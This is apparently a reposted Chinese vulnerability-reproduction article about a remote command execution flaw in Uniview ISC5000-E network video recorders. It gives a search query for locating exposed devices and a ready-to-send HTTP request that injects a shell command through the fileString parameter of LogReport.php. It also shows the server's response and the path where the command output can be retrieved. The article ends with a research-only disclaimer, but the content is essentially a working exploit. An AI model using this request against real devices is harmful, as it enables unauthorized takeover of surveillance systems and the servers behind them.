漏洞描述
浙江宇视科技有限公司(宇视uniview 创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。浙江宇视科技 网络视频录像机系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限.
资产收集
web.title=="ISC5000-E"
漏洞复现
构造请求包
GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bwhoami%3e1.txt HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate
返回包
HTTP/1.1 200 OKDate: Tue, 12 Dec 2023 01:58:12 GMTServer: UnisvrSet-Cookie: PHPSESSID=17eb6cc014818cbef45acae344db3914; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=utf-8Content-Length: 50
请求完毕,访问路径
http://ip:port/Interface/LogReport/1.txt
原文始发于微信公众号(Devil安全):【漏洞复现】浙江宇视 isc LogReport.php 远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论